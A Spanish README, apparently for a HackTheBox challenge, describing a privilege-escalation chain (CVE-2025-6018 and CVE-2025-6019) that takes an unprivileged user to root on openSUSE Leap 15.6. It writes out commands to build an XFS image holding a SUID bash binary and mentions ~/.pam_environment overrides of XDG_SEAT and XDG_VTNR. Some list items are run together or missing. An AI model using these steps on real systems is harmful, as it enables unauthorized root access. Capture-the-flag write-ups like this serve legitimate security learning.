
Cadena de exploits de escalada de privilegios (CVE-2025-6018 + CVE-2025-6019) para openSUSE Leap 15.6
Este exploit fue desarrollado para resolver un desafío de HackTheBox dirigido a openSUSE Leap 15.6.
Este exploit se basa en la investigación original del equipo de seguridad de Qualys:
Implementación de referencia adicional:
Este exploit encadena dos vulnerabilidades para lograr una escalada local de privilegios desde un usuario sin privilegios hasta root en openSUSE Leap 15.6:
El exploit requiere una imagen de sistema de archivos XFS previamente creada que contenga un binario SUID bash. Esto debe crearse en una máquina Linux donde tengas privilegios de root:
dd if=/dev/zero of=xfs.image bs=1M count=400
mkfs.xfs xfs.image
mkdir -p /tmp/mnt
mount xfs.image /tmp/mnt
cp /bin/bash /tmp/mnt/bash
chmod 04755 /tmp/mnt/bash
umount /tmp/mnt
Verifica que la imagen se creó correctamente:
file xfs.image
# Should output: "SGI XFS filesystem data (blksz 4096, inosz 256, v2 dirs)"
~/.pam_environment con anulaciones de XDG_SEAT y XDG_VTNRSi el exploit falla:
file xfs.imagesystemctl status udisks2Este exploit es solo para fines educativos y pruebas de seguridad autorizadas. Úsalo de manera responsable y únicamente en sistemas donde tengas permiso para realizar pruebas.